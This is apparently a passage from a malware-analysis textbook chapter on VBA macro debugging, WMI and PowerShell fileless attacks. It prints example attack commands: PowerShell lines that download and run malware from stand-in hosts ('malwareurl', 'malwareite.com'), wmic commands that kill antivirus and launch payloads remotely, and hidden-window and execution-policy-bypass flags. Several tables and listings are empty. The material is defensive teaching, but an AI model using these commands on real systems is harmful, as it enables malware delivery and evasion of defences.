VBA Debugger Shortcuts

Debugger Functionality

Keyboard Shortcut

Step Into


Step Over


Run to Cursor


Set Breakpoint




The debugger step functionalities Step Into, Step Over, and Breakpoints are the same as in all the other debuggers.

Document_Open is the first subroutine that is triggered when the document is opened. So let’s start debugging with the Document_Open() subroutine. You can take the cursor to the start of this subroutine and then press F8 to start the debugger at this point, as shown in Figure 20-22.
Figure 20-22

Starting VBA debugger from Document_Open subroutine of Sample-20-4.doc

As you can see, when you start the debugger from the Document_Open() location, you see a yellow arrow cursor on the margin on the left side of the code. This yellow arrow cursor points to the code which is going to be executed next. We can step through the code line by line to see the values in various variables that can hold deobfuscated content. The technique of starting debugger may vary between versions of Microsoft Office, but the overall techniques of debugging remain the same.

If you observe the macro code, two of the variables are used quite frequently FSGOPS and NAQGP. The variables are used again and again throughout the macro code, and some values are assigned to these. Most likely, these variables are likely to hold some important value.

If you scroll down through the code, you also see VMSXE.Eval(NAQGP). Eval similar to the one we encountered in JavaScript is meant to evaluate or execute a piece of code supplied to it as a string parameter. This means the variable NAQGP, which is supplied to the Eval function, is likely to contain some kind of deobfuscated code at the point where it is called. If you execute the code till this particular point where this Eval is invoked, you can expect that the NAQGP variable is going to have some deobfuscated content.

To directly execute the code till this Eval point, take your cursor to that Eval code location and then set a breakpoint there using the F9 key, as seen in Figure 20-23. As seen when you set a breakpoint, you see a maroon-colored dot on the left side of the code, and the code gets highlighted in maroon color as well. You can then execute the code until this breakpoint by using the F5 key.
Figure 20-23

Breakpoint hit at Eval() of Sample-20-4.doc

Figure 20-23 shows the debugger after executing has stopped at the breakpoint we have set at this location.

Now let’s look at the contents of the NAQGP variable. To view the contents of a variable, we can use Debug.Print, which can be executed in the Immediate window of the VBA debugger. You can launch the Immediate window by using the key combination of CTRL+G. Inside the Immediate window, type Debug.Print NAQGP and press enter to execute it, which prints the value of the NAQGP variable immediately, as seen in Figure 20-24.
Figure 20-24

Debug.print to view content of variable NAQGG in the Immediate Window

Figure 20-25 is a screenshot of the decoded contents of the NAQGP variable.
Figure 20-25

Decoded VBA code present in the variable NAQGP containing suspicious URLs

The decoded VBA code printed from the NAQGP variable that is executed from the Eval()contains an URL that points to file.exe on the host with IP address The macro seems to download this file from this URL, as indicated by the get HTTP request. The downloaded file.exe contents are saved to a file whose path is located in FullX, which is then executed as seen by the command ShellObj.Exec(FullX).

Other tools can help you to analyze VBA malware as well apart from the VBA debugger in Office tools and oledump.py we explored. Some of the other well-known ones are OleTools, OffVis, and OfficeMalScanner. As an exercise, try out these other tools and figure out how it works.

Fileless Malware

We have seen most of the malware have file instances on the hard drive that is executed to create a malicious process. This can pose a higher risk for malware as antiviruses constantly scan the hard drive for malware files. To evade antivirus disk scans, malware authors came up with fileless malware in which the malware file contents are not written to the disk.

There can be multiple ways in which a fileless malware can be created. If your malware is a PE executable that you have on a remote malicious server, you can download the contents of this malware file and can carry out complete in-memory process hollowing with the contents of the malicious PE executable that you can then insert into another hollowed process, all this without writing the contents of the malicious PE executable file to the disk. The other readily available technique is to use the windows scripting system to run malicious scripts.

Windows Management Instrumentation (WMI)

Windows Management Instrumentation (WMI) is an implementation of Web-Based Enterprise Management (WBEM), a standard for managing desktops, servers, and shares in an enterprise environment. The purpose of its existence is to help administrators to monitor and automate administrative tasks in an Enterprise ecosystem.

Since WMI is used as an administrative tool, it is less likely to be blocked or held suspicious by network administrators. These two factors make WMI the right candidate to be used for carrying out malicious attacks. Attackers can use the already existing WMI framework instead of installing new malware, called a living off the land attack. The earliest known malicious use of WMI was first seen in the infamous Stuxnet attack. Now it is gaining popularity among attackers to carry out the fileless attacks.

As malware analysts, we need not look at the fine implementation of WMI. Superficially we can consider WMI as a database that is enriched with information related to the current state of the system. It can contain detailed information/data about processes, services, hardware, and so forth, which WMI organizes into WMI classes. The classes are further grouped into namespaces. As an example, Win32_Process is a class that stores information about processes and is part of the root/cimv2 namespace.

Data can be retrieved from WMI using WMI queries, which are similar to SQL queries. Nirsoft SimpleWMIView tool , which we installed in Chapter 2 inside our analysis VM, can query data in WMI classes. Figure 20-26 shows a screenshot of the tool displaying the information about process details on the system obtained using the query class Win32_Process. This tool has various options and dropdowns to browse through the namespaces and classes. The Update (F5) button in the tool can execute a query, as seen in the figure.
Figure 20-26

SimpleWmiView tool that lets us browse through namespaces and classes and execute WMI queries

You can also directly query for WMI data using windows command prompt as well using the wmic command provided by Windows, which is what malware frequently use. If you remember in the previous chapter, we talked about how malware evades the security system, analysis tools by enumerating the environment the setup they are executing in. Malware can do the same using WMI queries as well.

Let’s try out the following command in our guest machine wmic process where "name like '%vm%' " get name inside a command prompt, also seen in Figure 20-27.
Figure 20-27

WMI query to list processes which have the string “vm” in their names

As seen, the wmi query lists all processes which have the string vm in their names. Since our analysis VM inside which we ran this command is installed on VMware workstation, we can see some of the guest VMWare related processes on the system.

Let’s try two more WMIC commands seen in Listing 20-11, that queries for the computer model and MAC address of the network interfaces on the system.
wmic computerSystem get Model
wmic nic get macaddress
Listing 20-11

WMI Queries to Get System Model and MAC Address Of the Network interfaces

Execute the two commands in Listing 20-11 in your command prompt as we have done in Figure 20-28. The first command gets the system model while the second gets the MAC address of the network interface cards.
Figure 20-28

WMI queries to get the system model and mac address of the network interfaces

The output of the commands shows that the system model and MAC address are related to VMWare. Isn’t this easy compared to calling several Windows APIs to obtain the same bit of information?

WMI can not only query the system but can also create new processes, terminate processes, copy files, and so forth. WMI can do the same, even on remote machines. This feature of WMI can be misused by malware to propagate themselves using lateral movement. Table 20-9 are some more examples of WMI commands that can be used by malware.
Table 20-9

WMI Commands For Process



wmic process where name="antivirus.exe" call terminate

Kills a process with name antivirus.exe

wmic.exe process call create malware.exe

Launches process for malware.exe file

wmic.exe /node:remote_ip process call create "malware.exe"

Launches malware.exe in a remote system whose ip is remote_ip

WMI commands can be triggered from VBA scripts in Word documents and PowerShell script files. The availability of WMI has made coding of evasion techniques by malware easier since they are available in scripting frameworks like VBA and PowerShell, which otherwise have been difficult.


PowerShell was created to cater to the automation needs on Windows, especially for administrative purposes. PowerShell has extensive access to the system resources and can access WMI as well. It can execute commands on local as well as remote machines. Also, PowerShell has some command-line options that can hide its presence from plain sight. Another powerful option that PowerShell provides is in-memory execution of PowerShell scripting code, which is used by attackers to carry out fileless malware attacks. These PowerShell attributes make it an appropriate tool to carry out malicious attacks.

The PowerShell scripts are written using PowerShell commands called cmdlets and PowerShell functions. In the next section, we look at some basics of cmdlets and some important cmdlets.

Cmdlets and Aliases

Command-lets or cmdlets are commands that are available for use in the PowerShell scripting language. Cmdlets are .NET classes compiled into DLL files which are accessible using PowerShell scripts or the PowerShell environment. Let’s try out some cmd-lets to understand how they work.

You can access the PowerShell scripting environment by typing in Windows PowerShell in your start menu, which shows you the Windows PowerShell application. Open this Windows PowerShell application, which is very similar to the regular command prompt available in Windows, except that you can see that the prompt has PS, which identifies that the scripting command environment available is that of PowerShell. You can type in your PowerShell commands there.

Let’s type in the first cmdlet, get-command, as seen in Figure 20-29, which lists all the various commands that the PowerShell environment supports.
Figure 20-29

PowerShell get-command command

If you look at the output, the first column tells the type of the command, second the name of the command, and third its description. There are three types of commands from the output: cmdlet, function, and alias. We already know what cmdlets are .Net compiled objects, whereas the function ones are written in PowerShell scripting language itself.

The cmdlet names are in the verb-noun format (e.g., Start-Process). The function names are in the verb-noun format (e.g., DownloadString). An alias can be an alternate name for a cmdlet, function, executable, and so forth. For example, IEX is an alias for the Invoke-Expression cmdlet. Alias names can be anything since it anyways points to another cmdlet or function. That's why aliases are used in Obfuscated PowerShell scripts where random weird alias names are used by attackers that point to other cmdlets, functions, executables so that analysts find it hard to statically analyze PowerShell scripts.

To know the name of an alias corresponding to a cmdlet, you can use the command Get-Alias. The Get-Alias -Definition Invoke-Expression command gets the alias name for Invoke-Expression cmdlet, which is iex. If you want to know the cmdlet or function corresponding to a particular alias, you can use the same Get-Alias command in combination with findstr windows command. Get-Alias| findstr "iex" PowerShell command can get you the cmdlet whose alias is iex.

Table 20-10 holds a list of some cmdlets and functions that are frequently seen in malicious PowerShell scripts.
Table 20-10

Some Commonly Used Commands and Functions Used by Malware






Evaluates expression



Executes command on local or remote machine



Starts a process



WMI class information



Downloads file to disk



Downloads a web page to memory



Executes a command

The cmdlets can be directly called from a PowerShell script. But to call a function, you need to create an object out of the .Net class containing the function and then access the member function from the created object.

The code in Listing 20-12 shows the usage of a cmdlet and function in a PowerShell script.
(New-Object System.Net.WebClient).DownloadFile('malwareurl/malware.exe',"C:\virus.exe");
Start-Process ("C:\virus.exe");
Listing 20-12

Example PowerShell Script That Shows Usage Of Cmdlet and Functions

In the PowerShell script code, the first line download malware.exe hosted on malwareurl server to a local file virus.exe using DownloadFile function. The DownloadFile function is a part of System.Net.WebClient .NET class. An object is created out of the class by using the New-Object keyword. Afterward, the DownloadFile function, which is a method of the System.Net.WebClient class, is accessed. The second code line shows the usage of StartProcess cmdlet, which executes the virus.exe file.

In-Memory Attacks

PowerShell cmdlets and functions can automate large tasks and other malicious activities by attackers. The scripts can be saved to a file, and the file name is passed on as a parameter to the PowerShell command. Also, the script code can itself be passed as a parameter to the PowerShell command. PowerShell provides various command-line options that attackers can use to evade the system. Table 20-11 lists some of these command-line options and their description.
Table 20-11

Some of the PowerShell Command-Line Parameters

Command Option



Option to pass script file to PowerShell

-Command / -c

Executes PowerShell commands directly from the prompt instead of script

-Nop / -Noprofile

Ignores commands in the profile file

-WindowStyle hidden / -w hidden

Hides the window from the user

-Exec Bypass

Bypasses execution policies or restriction on the system related to PowerShell

-EncodedCommand / -e / -Enc

Passes encoded commands which are mostly base64 encoded

As an exercise in your PowerShell command prompt type in the command powershell.exe -nop -w hidden -c Start-Process(calc.exe); and hit enter as shown in Figure 20-30.
Figure 20-30

PowerShell command that starts calculator process in hidden mode

After you hit Enter, the prompt vanished, and calc.exe (calculator) pops up. So if instead of a calculator program, if it were a malware executable, you would not have got hints of the PowerShell execution since the PowerShell prompt vanishes. Since most malware does not have GUI, you wouldn’t be alerted to the start of this malware process.

Even contents of an entire PowerShell script file can be passed on to the command line as an argument. As an example seen in Listing 20-13, we have taken the PowerShell script code in Listing 20-12 and passed it as an argument to the PowerShell command.
powershell.exe -nop -2 -hidden -c (New-Object System.Net.WebClient).DownloadFile('malwareurl/malware.exe',"C:\virus.exe"); Start-Process ("C:\virus.exe");
Listing 20-13

PowerShell Script Passed As a Command-Line Argument Value

Attackers can make the command more cryptic by encoding them, and using powershell -e command executes these encoded commands. Listing 20-14 shows an example of PowerShell command that executes an encoded command. You can run the command in your PowerShell command prompt.
Listing 20-14

PowerShell Command That Runs Another Encoded PowerShell Command

The long encoded string is a base64 encoded form of the PowerShell command powershell.exe -nop -w hidden -c Start-Process(calc.exe). To verify this you can copy the base64 string and decode it using any of the online base64 decoders.

If you are an attacker you can place this entire command as a run entry in the registry like you learned in Chapter 8, and this entire command line is executed on bootup without even needing to have a script file on the disk. This technique can maintain persistence in fileless attacks.

Attackers take this whole in-memory attack even further by hosting malicious PowerShell scripts on remote servers. A PowerShell script can then use the DownloadString function to download this PowerShell script file’s contents to memory without writing it to disk. Then the downloaded script in memory can then be executed in memory by using Invoke-Expression or IEX cmdlet. Listing 20-15 shows an example of in-memory execution of a PowerShell script named malScript.ps1 hosted on remote website malwareite.com that is downloaded and executed all in memory.
powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient).DownloadString(hxxp://malwareite.com/malScript.ps1));
Listing 20-15

Attackers Using In-Memory Execution to Run Malicious Scripts Hosted Remotely

More complex attacks like reflective DLL injection attacks can also be carried out by using this in-memory execution feature of PowerShell. The attacks can be made more sophisticated by the use of WMI in the scripts and other persistence mechanisms and all the living off the land using the tools provided natively by the Windows OS environment.

PowerShell scripts can also be debugged using PowerShell ISE, an integrated debugging scripting environment for PowerShell. You can apply the same deobfuscation tricks we used in debugging JavaScript and VBA programs using PowerShell ISE, which we leave as an exercise for you.


Scripting based malware attacks are huge, allowing attackers to leverage the various programming and scripting environments natively available in the OS subsystem, basically allowing them to live off the land. In this chapter, we explore JavaScript malware and how to both statically and dynamically deobfuscate and dissect them to figure out their functionality. We also explore the various kinds of obfuscation techniques commonly used by obfuscators to obfuscate scripting code.

We then explore Visual Basic scripting malware and the more commonly used VBA macro scripting malware embedded and distributed via malicious Microsoft Office documents. You learned how to use the VBA debugger in Microsoft Office tools to debug these embedded macros in these Microsoft Office files. You also learned how to use other analysis tools like oledump.py using which we can dump and analyze these macros and other embedded executable files contained within these documents, a technique frequently used by attackers to ship around malicious PE executables embedded in these document files.

Lastly, we covered WMIC and PowerShell based scripts that are leveraged by attackers to launch covert attacks that are fileless and in-memory, leaving no traces of their execution on the system.

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